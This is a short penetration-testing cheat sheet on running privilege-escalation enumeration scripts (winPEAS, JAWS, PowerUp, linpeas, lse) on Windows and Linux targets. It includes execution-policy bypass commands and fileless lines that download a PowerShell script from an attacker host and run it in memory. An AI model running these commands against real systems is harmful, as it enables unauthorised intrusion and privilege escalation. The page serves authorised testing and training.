Enumeration scripts

For privilege escalation

Windows

Run from within CMD shell and write out to file

winpeas.exe cmd > winpeas.txt

To be able to use less we need to convert it to UTF-8 first.

iconv -f utf-16le -t utf-8 winpeas.txt -o winpeas-utf-8.txt
less -R winpeas-utf-8.txt

Run from within CMD shell and write out to file.

CMD C:\temp> powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

Run from within PS Shell and write out to file.

PS C:\temp> .\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt

Complete and official PowerUp documentation + great cheatsheet blog.

From a Powershell session. We need to previously download the script on the target system's disk.

To output to a HTML file add the flag -HTMLReport

PS C:\> powershell -ep bypass       #Execution Policy Bypass
PS C:\> Import-Module PowerUp.ps1   #Import PowerUp module
PS C:\> Invoke-AllChecks            #Will checks for all possible Priv Esc Path

Without touching the disk

PS C:\> IEX(New-Object Net.WebClient).DownloadString(‘http://<kali_ip>/PowerUp.ps1’)
PS C:\> iex (iwr 'http://<kali_ip>/PowerUp.ps1') #Powershell >= v.3

Linux

# Output to a file
./linpeas.sh -a > linpeas.txt

# Read with less
less -r linpeas.txt

./lse.sh > lse.txt

Verbosity level

 -l LEVEL     Output verbosity level
                 0: Show highly important results. (default)
                 1: Show interesting results.
                 2: Show all gathered information.

Specific tests to run

-s SELECTION Comma separated list of sections or tests to run. Available
               sections:
                 usr: User related tests.
                 sud: Sudo related tests.
                 fst: File system related tests.
                 sys: System related tests.
                 sec: Security measures related tests.
                 ret: Recurren tasks (cron, timers) related tests.
                 net: Network related tests.
                 srv: Services related tests.
                 pro: Processes related tests.
                 sof: Software related tests.
                 ctn: Container (docker, lxc) related tests.
                 cve: CVE related tests.

Specific for Kernel Exploits

Linux Exploit Suggester and Linux Exploit Suggester 2

Last updated